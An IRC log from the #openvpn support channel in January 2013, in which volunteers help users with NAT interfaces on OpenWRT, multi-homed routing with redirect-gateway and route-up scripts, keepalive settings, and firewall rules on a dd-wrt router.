19:51 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 19:56 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Quit: Leaving] 19:57 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 20:04 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 252 seconds] 20:05 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 20:08 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 20:10 -!- ch1mkey [ch1m@ns203993.ovh.net] has left #openvpn [] 20:22 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 20:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 20:52 -!- paccer [uid4847@gateway/web/irccloud.com/x-iggwqzmrrmnhkcai] has joined #openvpn 21:27 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 272 seconds] 21:33 -!- yeshello1here is now known as Winkie 21:33 -!- Winkie [~hi@80.168.239.88] has left #openvpn [] 21:42 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 22:12 -!- brute11k [~brute11k@89.249.230.77] has quit [Quit: Leaving.] 22:14 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 22:22 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 22:23 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 256 seconds] 23:00 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 23:23 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 264 seconds] 23:33 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 23:39 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 240 seconds] 23:39 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 23:45 < anth0ny> I'm finishing up the routed VPN setup on an OpenWRT router that I have. 
Looking at the howto.html page on the OpenVPN site, it says that I should NAT the VPN client traffic to the internet, using this: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE, with eth0 being the local ethernet interface. I'm not sure that this is the right choice for my router, would someone mind looking at my ifconfig output and letting me know what they think is the right choice: http://pastie.org/private/fitmdhshv6zyzxct8p5w ? 23:47 < anth0ny> Not sure if I should use br0, vlan1, or eth0 23:55 < anth0ny> !goal 23:55 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 23:59 < ngharo> you want the internet-facing interface --- Day changed Mon Jan 14 2013 00:02 < anth0ny> ngharo, is there a way to test what that is, exactly? 00:02 < anth0ny> there are two eth's and two vlans 00:03 < anth0ny> br0 and vlan1 are the only ones with inet addr's 00:03 < ngharo> i'm assuming the vlan with the IP 00:04 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 00:05 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 00:09 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 240 seconds] 00:14 <+pekster> He wants eth0.1 in a standard OpenWRT setup (in case he comes back and I'm not around to notice it) 00:15 <+pekster> And yea, 'ip addr show' would identify it :P 01:18 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 01:34 -!- hydroxyhydride [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has joined #openvpn 01:34 -!- bumblebee [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has joined #openvpn 01:46 -!- bumblebee [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has quit [Ping timeout: 246 seconds] 01:47 -!- hydroxyhydride [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has quit 
[Ping timeout: 276 seconds] 02:00 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:27 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 02:47 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 02:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 02:51 -!- mode/#openvpn [+o vpnHelper] by ChanServ 03:02 -!- thinkHell [~Hell@ks399220.kimsufi.com] has joined #openvpn 03:16 -!- defswork [~andy@141.0.50.105] has joined #openvpn 03:31 -!- dazo_afk is now known as dazo 03:55 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 03:58 -!- Z_Analyzer [~lipalm@173-164-219-57-SFBA.hfc.comcastbusiness.net] has quit [Quit: Leaving] 04:02 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 04:03 < holmen> Hi, anyone here up for teaching me how to work out my two NIC tunneling problem? 04:04 <+pekster> holmen: You tend to get better results in a channel full of community volunteer support if you just ask your question ;) 04:04 <+pekster> !ask 04:04 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 04:07 < holmen> I have a setup of two physical NICs in my Ubuntu 12.04 server. NIC #1 is connected to a router that gets EXT IP #1. NIC #2 is directly connected to the internet and gets EXT IP #2. Now when setting up an openvpn CLIENT with the option "local " the tunnel activates on NIC #1. I have made the correct routings for NIC #2 and it's able to both send and receive traffic. 04:11 < holmen> To add to this, I am not the server admin of the server I'm trying to connect to so I can't change settings on the server side. 04:21 <+pekster> holmen: Sorry for the delay, I'm not able to give 100% time to IRC. 
So you're connecting from an external client to the public IP that doesn't contain the default route on the server? 04:23 -!- Assid [~assid@198.24.140.58] has joined #openvpn 04:23 -!- Assid [~assid@198.24.140.58] has quit [Changing host] 04:23 -!- Assid [~assid@unaffiliated/assid] has joined #openvpn 04:23 < Assid> heya 04:24 < Assid> so i have an openvpn connection which seems to timeout or something.. and it doesn't seem to reconnect on its own.. which results in connectivity issues since I'm using redirect-gateway 04:25 <+pekster> Assid: the --ping and --ping-restart options (also see the --keepalive helper that abstracts both) will auto-reconnect after contact with the peer is lost 04:27 <+pekster> Note that you need --ping (or --keepalive, which on the server does a push for both options) on *both* ends of the connection (it's okay of course for the server to push this if clients pull it.) The ping is not bi-directional, so the opposing peer needs a --ping for the local peer to make use of --ping-restart or --ping-exit options 04:29 < Assid> what if the server doesn't do keepalive or ping 04:30 <+pekster> Then you can't use that option, and there's no way to know if your connection to the peer was severed internal to OpenVPN 04:30 <+pekster> You could write a creative script to do a standard ping to the peer IP and take restart action if it doesn't respond after so many attempts 04:30 <+pekster> But that's kind of ugly and exactly what the --ping/--ping-restart options are designed to handle 04:30 < Assid> yeah i thought the internal ping does ? 04:31 < Assid> exactly what i meant 04:31 <+pekster> OpenVPN's ping is not an ICMP echo-request (commonly called a "ping" packet in casual network speech) 04:31 <+pekster> It's sent within the OpenVPN control channel 04:32 <+pekster> !keepalive 04:32 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. 
or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 04:33 -!- Assid|2 [~assid@85.159.236.219] has joined #openvpn 04:33 < Assid|2> ok 04:34 -!- Assid [~assid@unaffiliated/assid] has quit [Disconnected by services] 04:34 -!- Assid|2 is now known as Assid 04:34 -!- Assid [~assid@85.159.236.219] has quit [Changing host] 04:34 -!- Assid [~assid@unaffiliated/assid] has joined #openvpn 04:34 < Assid> hmm 04:34 < holmen> pekster: I'm connecting to an external service, yes. And I want openvpn to tunnel the NIC#2 to that service but when enabling the tunnel it goes for the NIC#1 by default. I have added my query on the stack exchange network with full setting files etc. If you want to take a look: http://unix.stackexchange.com/questions/60955/openvpn-struggling 04:34 <@vpnHelper> Title: ubuntu - OpenVPN struggling - Unix and Linux (at unix.stackexchange.com) 04:34 < Assid> ok i think it should work with keepalive 04:34 < Assid> else will figure something else 04:34 < Assid> btw. anyone here using privateinternetaccess ? 04:35 < Assid> I'm thinking it's prone to MITM since they don't use nsCertType=server 04:36 <+pekster> holmen: What do you mean "it goes for the NIC#1 by default?" 
If the client connects to another interface on the server that has a unique public IP, the server needs to be configured on a network level (outside OpenVPN) to correctly multi-home or it simply won't work 04:37 <+pekster> Assid: I'd need to see a full client config file, but that's possible; it's very easy to implement security software incorrectly 04:38 <+pekster> If their certs are set up properly, you could likely add that option in yourself on the client side 04:38 <+pekster> Some places use the KU/EKU fields instead, or a different solution to the problem of clients posing as a valid server 04:39 < holmen> pekster: Ok, the reason I'm doing this is that I only want i specific program to tunnel its traffic through openvpn, to an anonymizer service. And since they are the ones hosting the server, should I ask them for advice? 04:39 < holmen> i =1 04:41 <+pekster> holmen: Oh, is your client the one that's multi-homed? 04:41 < holmen> Yes, if you by that mean that it's the one with two NICs 04:44 <+pekster> Ah, okay. The issue is your routing table. 'ip route show' will identify your default gateway out eth0, I'd expect 04:45 <+pekster> To multi-home like that, you need to define routing rules to identify traffic that needs to be routed to a gateway on eth1, which generally requires a separate routing table and 'ip rule add ...' rules to identify which traffic to send to that lookup table 04:45 < holmen> i have already added that information to the routing tables 04:46 <+pekster> 'ip route show table all' has your extra tables? and 'ip rule show' has rules to split traffic between them? 
04:47 <+pekster> holmen: You should use -I $pub_ip_of_eth1 instead on your ping 04:47 <+pekster> Make sure that works first 04:48 <+pekster> If not, you have broken multi-homing 04:48 <+pekster> If you need it, here's LARTC's howto on advanced routing: http://lartc.org/howto/ 04:48 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 04:49 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 04:49 < holmen> Thank you! I'll check this and get back to you. 04:50 <+pekster> For example, I have a server inside my network with 2 IPs; if I tcpdump the interface, I can watch it use different sources (eg: 'tcpdump -pni eth2 icmp') when I do 'ping -I 10.0.0.20 kernel.org' versus 'ping -I 10.0.0.21 kernel.org'. Make sure it works as expected on your setup (ofc, change tcpdump interfaces for your test since it goes across 2 different adapters) 04:50 -!- IT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 04:54 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:55 -!- Assid|2 [~assid@122.170.9.45] has joined #openvpn 04:56 < holmen> I've tried that now and the icmp-packets are sent as they should. The ping goes from ETH#2 to ETH#2. 04:56 -!- Assid [~assid@unaffiliated/assid] has quit [Ping timeout: 246 seconds] 04:58 <+pekster> holmen: Okay. 
The other thing I see now that I double-check the netstat output post-VPN-connect is that the host-route to the VPN endpoint is automatically set to use your existing default gateway, which is via eth0 04:59 <+pekster> holmen: What you probably need to do is use the 'local' flag to the redirect-gateway directive, and handle the host-route yourself via a --route-up script 04:59 <+pekster> That's necessary because you specifically DON'T want the VPN endpoint to be reachable via eth0's IP/interface 05:00 <+pekster> You probably need to use the env-vars the scripts make available to you in order to dynamically determine your remote peer's public IP 05:00 <+pekster> (since you have multiple remote lines) 05:01 <+pekster> 'ip route add $whatever_that_var_is/32 via $pub_ip_of_eth2' 05:01 < holmen> Ok, now comes the noob question. Where can I find the necessary manuals on this? I don't want to hammer you with all my questions :) 05:01 <+pekster> The manpage? 05:01 <+pekster> !man 05:01 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 05:01 <+pekster> On Linux, you should have 'man openvpn' available 05:01 < Assid|2> setting up another box now 05:02 <+pekster> Yea, I missed that route at the beginning of your output. FYI, 'ip route' is a much cleaner way to show routes; netstat or route are kind of outdated tools :P 05:02 < holmen> Thanks in advance, I'll read up on this and probably get back in the morning. Thank you for all the help 05:04 <+pekster> Yea, np. 
It's a subtle problem with the way --redirect-gateway expects your network to be 05:04 <+pekster> The only bad news is that you mostly need to fix it yourself :P 05:05 <+pekster> On the plus side, it should be a one-line fix in --route-up and --down (since you probably want to remove the route on disconnect) 05:06 <+pekster> 'man ip' and 'ip route help' are also good places to look for info using the ip command 05:06 <+pekster> btw, you win my 'most interesting problem of the month' award that I just made up 05:09 < holmen> haha thank you :) 05:09 <+pekster> I enjoy subtle problems like that; it keeps me on my guard from assuming too much for my own good 05:09 < holmen> The down side is that I'm quite the noob on openvpn and probably will fail on this but trial and error is key :) 05:11 <+pekster> Well, the only ovpn-changes I think you need are using the 'local' flag to --redirect-gateway, and 2 scripts at --route-up and --down. The route-up script needs to add the route as I explained above to your VPN endpoint (there's a variable for that, see the 'SCRIPTING AND ENVIRONMENTAL VARIABLES' manpage section) while the down script needs to remove it on VPN disconnect 05:11 <+pekster> So, 3 changes to the ovpn config, and 2 scripts that you can probably do with a single line of code 05:12 <+pekster> holmen: I think the var you want is $trusted_ip 05:12 <+pekster> FYI 05:12 <+pekster> (available in both --route-up and --down) 05:13 <+pekster> Try something along the lines of '/sbin/ip route add $trusted_ip/32 via $YOUR_ETH1_IP_HERE' 05:14 <+pekster> In the upscript, and the reverse (ip route del ...) 
in --down 05:21 -!- Assid|2 [~assid@122.170.9.45] has quit [Read error: Connection reset by peer] 05:21 -!- daemon [staff@hashweb.org] has quit [Read error: Connection reset by peer] 05:21 -!- daemon [staff@hashweb.org] has joined #openvpn 05:21 -!- nullsign [~nullsign@daedalus.genom.com] has quit [Read error: Operation timed out] 05:21 -!- daemon is now known as Guest47187 05:21 -!- batrick [~batrick@nmap/developer/batrick] has quit [Read error: Operation timed out] 05:21 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 05:22 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 05:22 -!- nullsign [~nullsign@daedalus.genom.com] has joined #openvpn 05:24 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 05:30 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Ping timeout: 276 seconds] 05:40 < holmen> pekster: one quick question. How should i use the --redirect-gateway. You mention that i should use the "local" flag. So "--redirect-gateway local" or "--redirect-gateway " ? 05:40 <+pekster> Yea, 'local' is a literal flag. You're already using the 'def1' flag (notice your 2 /1 route overrides on your default gateway) 05:40 <+pekster> Manpage has details on the usage of each flag 05:43 < holmen> gonna change ssh connection and try it out. 05:43 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: leaving] 05:45 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 05:56 < holmen> pekster: hmm, 1 error when trying to execute the up script manually 05:56 < holmen> holmen@filserver:~$ sh openvpn/up 05:56 < holmen> Error: an inet prefix is expected rather than "/32". 
06:01 < holmen> entry in "up": /sbin/ip route add $trusted_ip/32 via 5.150.223.121 06:01 < holmen> and file set to be executable 06:07 < holmen> While starting the tunnel I get this log message: 06:07 < holmen> Mon Jan 14 13:06:08 2013 ROUTE default_gateway=192.168.1.1 06:07 < holmen> think that is my problem? 06:12 < holmen> while tunnel active: 06:12 < holmen> holmen@filserver:~$ ip route show 06:12 < holmen> 0.0.0.0/1 via 46.246.23.129 dev tap0 06:12 < holmen> default via 192.168.1.1 dev eth0 metric 100 06:12 < holmen> x.x.x.x/17 dev eth1 proto kernel scope link src x.x.x.x 06:12 < holmen> 46.246.23.128/25 dev tap0 proto kernel scope link src 46.246.23.180 06:12 < holmen> 80.67.8.203 via x.x.x.x dev eth1 06:12 < holmen> 80.67.8.211 via x.x.x.x dev eth1 06:12 < holmen> 128.0.0.0/1 via 46.246.23.129 dev tap0 06:12 < holmen> 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.2 06:13 < holmen> Mon Jan 14 13:12:32 2013 WARNING: Failed running command (--up/--down): could not execute external program 06:15 < holmen> I fixed the up/down scripts by removing the "/32" but it still won't execute it whilst starting openvpn 06:17 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:18 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 06:25 -!- Guest47187 [staff@hashweb.org] has left #openvpn [] 06:30 -!- thinkHell [~Hell@ks399220.kimsufi.com] has quit [Quit: ["pop()"]] 06:30 < holmen> pekster: I see now what may be my problem, in "ip route show all" the eth1 routing is as follows: 06:31 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 06:31 < holmen> x.x.128.0/17 dev eth1 proto kernel scope link src x.x.223.x 06:31 < holmen> notice the changes in subnet.. 
06:32 < holmen> then my extra routing table "openvpn" looks like this: 06:33 < holmen> holmen@filserver:~$ ip route show table openvpn 06:33 < holmen> default via x.x.223.x dev eth1 06:33 < holmen> x.x.223.x dev eth1 scope link src x.x.223.x 06:34 < holmen> but the odd thing is that I can connect to the internet via eth1 on the 223 subnet. :S 06:44 <+pekster> holmen: The redirect-gateway OpenVPN directive will only operate on your main table, IIRC 06:44 <+pekster> With policy routing you'll likely need to handle adjustments to other tables via the --route-up and --down scripts, or use --route-noexec (see the manpage for details) and then you are expected to manage all route changes that are passed to you as env-vars instead of having OpenVPN automatically manage them 06:46 < holmen> holy crap. I think this issue just got past my skill level :/ 06:48 <+pekster> Policy routing and split-route setups are complex enough with just the 2 interfaces, but now you're trying to stack redirection of both across a VPN link too ;) 06:50 < holmen> Hmm I don't know if I misinterpret you now but I only want one interface to go into the tunnel . 
06:50 <+pekster> Oh, in that case then the changes I noted earlier to keep the VPN-host-exception routed via NIC#2's public IP should do the trick 06:51 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 06:51 <+pekster> You don't need to worry about your 2nd table controlling the NIC#2 traffic beyond adding a host-route (the /32 thing) out via NIC#2's public IP 06:51 < holmen> Ok but when setting up the tunnel I get the log message of Default gateway being the NIC#1 gateway 06:52 <+pekster> Right, but if you use the 'local' option, then you can override the implied error resulting from that setup 06:52 <+pekster> See, without the 'local' flag, OpenVPN will add a route to your external IP of the VPN server so it is *not* routed across the VPN (you need this because you can't route your encrypted VPN packets over the VPN: see the problem with that?) 06:53 <+pekster> So, once you understand why that needs to be added, you can pass the 'local' flag to not do that automatically (which uses your existing default gateway on NIC#1) and instead manage that same feature yourself by sending traffic to the VPN host out NIC#2 06:53 <+pekster> Hence the 'ip route add $trusted_ip/32 via $public_ip_on_nic2' line 06:54 <+pekster> You need that on the routing table responsible for traffic generated by NIC#2 where your openvpn instance is running 06:54 <+pekster> After that, the magic of --redirect-gateway will override your default route on NIC#1 by adding the 2 routes with the /1 mask (128.0.0.0) that define the entire Internet. This sends them via your VPN peer IP over the tun device 06:56 <+pekster> So, with the --route-up and --down script, I think you'll be set, but only if the gateway you wish to override is on your main routing table (not a sub-table you're sending stuff to with a custom 'ip rule' setup.) Is that the case, or is your configuration more complex? 06:56 < holmen> Ok. It's a lot to take in but I get the gist of it I think. 
Can I PM you my setup files and program execution lines for further knowledge? 06:57 <+pekster> Sure, although I'll try to keep discussion here if you don't mind (if you don't want your private configs posted here feel free to PM them) but others might benefit from the overall discussion, or even see something I miss 06:57 < holmen> Ofc 06:58 <+pekster> At the very least, I can see what you have now to make sure I get what you have and what's configured; it'd be helpful in addition to client ovpn config files to get the scripts, plus the output of 'ip route show table all' 06:58 <+pekster> 'ip addr show' would be useful too so I know what I'm actually looking at :P 06:59 <+pekster> I'll be around, so if I don't respond right away I'm probably just in another window for a bit 07:09 -!- brute11k [~brute11k@89.249.230.77] has quit [Ping timeout: 272 seconds] 07:17 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Ping timeout: 272 seconds] 07:19 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 272 seconds] 07:23 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 07:46 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 07:46 < AsadH> novaflash ! 07:46 < novaflash> mm? 07:46 < AsadH> I found you 07:46 < AsadH> That's all 07:47 < novaflash> mm. 07:47 -!- centurio [~opera@anon-185-82.vpn.ipredator.se] has joined #openvpn 07:47 < centurio> hello 07:48 < centurio> May I ask for help about iptables? 
07:48 <+pekster> centurio: As it relates to OpenVPN, go for it; depending on your question it's possible #netfilter may be a better place to ask, but you're welcome to try here first 07:51 < centurio> thanks 07:51 < centurio> I'm running openvpn client on a dd-wrt router 07:52 < centurio> I have modified the iptables contrary to what my vpn provider told me 07:53 < centurio> the problem was that the dns requests were not passed through the clients on my network 07:53 < centurio> only my isp dns servers, which don't work once the tunnel is up 07:54 < centurio> dnsmasq is set to use public servers 07:54 < centurio> http://www.pastebay.com/1174089 07:54 < centurio> I pasted my previous config and my new config 07:54 < centurio> the new config works, I do not have to set static dns on every client of my network 07:55 < centurio> but I'm not sure the new config is secure 07:55 < centurio> I use it together with --up 07:55 <+pekster> You can remove line 20 as it's worthless 07:56 < centurio> ok 07:57 <+pekster> Otherwise sure; the only forwarded traffic from tun0 to br0 will be stuff bound for your private clients, otherwise it'll end up on INPUT. You should really only accept --state RELATED,ESTABLISHED traffic there instead 07:57 <+pekster> Then you don't need to switch rulesets when you start/stop the VPN 07:57 <+pekster> Just use the 2nd one and you'll be set 07:59 <+pekster> No idea why you're using -I all over the place either; if you call those scripts over and over you'll just keep inserting more and more rules into your kernel; you should really use iptables-restore for that, and pass it a file you create with iptables-save (unless you really need rules to be dynamically managed) 08:01 < centurio> I was advised to do so 08:01 < centurio> alternatively, I can create a down script removing all the rules 08:02 < centurio> should I replace -I by -A? 08:03 <+pekster> I don't really have a clue how your setup is. 
If that's your only VPN (and will thus always be tun0) you can just leave your ruleset in place persistently and not worry about overriding the existing chains when the VPN comes up 08:04 < centurio> yes, it's my only vpn 08:04 <+pekster> With OpenWRT you should be hooking into the existing chains (they have special user chains for stuff like this you're supposed to be using.) I don't know what they are offhand because my OpenWRT setup has a firewall I wrote from scratch, so it's nothing like a standard setup 08:04 <+pekster> They have something named 'user_forward' and 'user_input' or something to that effect 08:05 <+pekster> (personally, I think the OpenWRT default is really messy and ugly and hard to follow, but it's all magically supported by LuCI, so it stays that way) 08:05 < centurio> lots of people advised me to go OpenWRT 08:05 <+pekster> If you can post your OpenWRT ruleset via 'iptables-save' to a pastebin site (after a reboot or something would be good so all your rule inserts don't pollute the output) I might be able to suggest a solution 08:06 <+pekster> centurio: Yes, the distro is fine. Managing custom iptables rules with a VPN is non-trivial to set up, however. 
I can likely give you a suggestion if I get a default ruleset that you can add to /etc/firewall.user 08:06 <+pekster> The OpenWRT firewall is "not simple" 08:09 < centurio> hmm I can't get iptables to show me the current rules 08:11 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 08:12 <+pekster> Don't use iptables; it's a bad way to dump rules 08:12 <+pekster> 'iptables-save' is what you should be using 08:13 < centurio> iptables-save :not found 08:16 < centurio> looks like I can't do this on dd-wrt 08:18 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 08:18 < centurio> so I uploaded a new version 08:18 < centurio> http://www.pastebay.com/1174104 08:20 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 272 seconds] 08:21 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Quit: Nettalk6 - www.ntalk.de] 08:22 <+pekster> centurio: Well, you can pastebin 'iptables -nvL' and 'iptables -t nat -nvL' and 'iptables -t mangle -nvL' as well 08:23 <+pekster> Stupid dd-wrt devs not making that a default feature 08:26 < centurio> iptables -nvL: http://www.pastebay.com/1174110 08:27 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 08:28 < centurio> 'iptables -t nat -nvL: http://www.pastebay.com/1174111 08:29 <+pekster> centurio: Okay, ask the #dd-wrt folks how to add these rules to your firewall on-boot: https://pastee.org/5cbwp 08:29 < centurio> iptables -t mangle -nvL: http://www.pastebay.com/1174112 08:30 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has joined #openvpn 08:30 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has quit [Changing host] 08:30 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:30 <+pekster> You'll then need to figure out how to route them via that link 08:30 <+pekster> No clue if you're already using a 'redirect-gateway' setup, but if not you'll need to write some routing rules to do that in addition to the firewall config 08:32 -!- Saviq_ 
[~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 08:37 < centurio> ok 08:37 < centurio> thanks for the help 08:37 <+pekster> Yup. All that -I crap kept inserting new rules in your firewall, so you probably want to reboot if you don't know how to reload your firewall to its proper setup 08:38 < centurio> these rules you pasted are in addition to what I also pasted here: http://www.pastebay.com/1174104 08:38 <+pekster> No 08:38 <+pekster> In place of that 08:38 < centurio> cool 08:38 < centurio> much more neat 08:38 <+pekster> Don't run stuff like that each time you connect to the VPN; it's really bad for your ruleset 08:39 <+pekster> Dynamic managing of your ruleset on-event like that requires advanced scripting and knowledge of the netfilter (aka "iptables") system 08:39 < centurio> that is out of my league 08:39 <+pekster> So: don't do it! (unless you really know what you're doing.) Whoever gave you that script had no clue what they were doing 08:39 < centurio> nice 08:40 <+pekster> Just use the crap I gave you for your firewall; ask the dd-wrt folks how to apply it when your ruleset starts up 08:40 <+pekster> That's not routing mind you, just the firewall to permit access how you need 08:41 < centurio> ok 08:41 < centurio> thanks for the advice 08:41 < centurio> I'll let you know how it turns out 08:48 -!- centurio [~opera@anon-185-82.vpn.ipredator.se] has quit [Ping timeout: 256 seconds] 08:59 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 09:02 -!- Orbital [~opera@anon-184-93.vpn.ipredator.se] has joined #openvpn 09:03 -!- Orbital is now known as Guest97591 09:05 -!- Guest97591 [~opera@anon-184-93.vpn.ipredator.se] has left #openvpn [] 09:06 -!- Guest97591 [~opera@anon-184-93.vpn.ipredator.se] has joined #openvpn 09:15 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 09:21 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 09:21 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for 
his shirt] 09:22 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has joined #openvpn 09:22 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has quit [Changing host] 09:22 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:25 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:33 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:37 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 264 seconds] 09:40 -!- Guest97591 [~opera@anon-184-93.vpn.ipredator.se] has quit [Ping timeout: 252 seconds] 09:41 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:44 -!- Azrael808 [~peter@212.161.9.162] has quit [Client Quit] 09:45 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 10:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 10:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:11 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 10:11 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 272 seconds] 10:11 -!- Alanonzander [~azander@209.124.51.200] has joined #openvpn 10:12 < Alanonzander> !welcome 10:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample 10:12 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:12 < Alanonzander> !redirect 10:12 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 10:12 <@vpnHelper> http://ircpimps.org/redirect.png 10:13 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 10:17 < Alanonzander> I need assistance getting an internal OpenVPN client to send _some_ of it's output via the openVPN server. What I need is some examples to help me understand what I need to do. I have looked at the redirect from the bot, and it only helps to confuse me. 10:17 -!- Orbi [~opera@anon-149-38.vpn.ipredator.se] has joined #openvpn 10:17 <@ecrist> !goal 10:17 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:17 <@ecrist> we need more specific information of what you mean by _some_ 10:18 < Orbi> @pekster 10:18 < Alanonzander> I need to proxy a SFTP and a Soap/WSDL connection through the VPN. 10:18 < Alanonzander> both are outgoing from the client. 10:18 <@ecrist> are those connections made to a specific IP? 10:18 < Alanonzander> yes 10:18 <@ecrist> is that IP on the VPN, or somewhere else? 
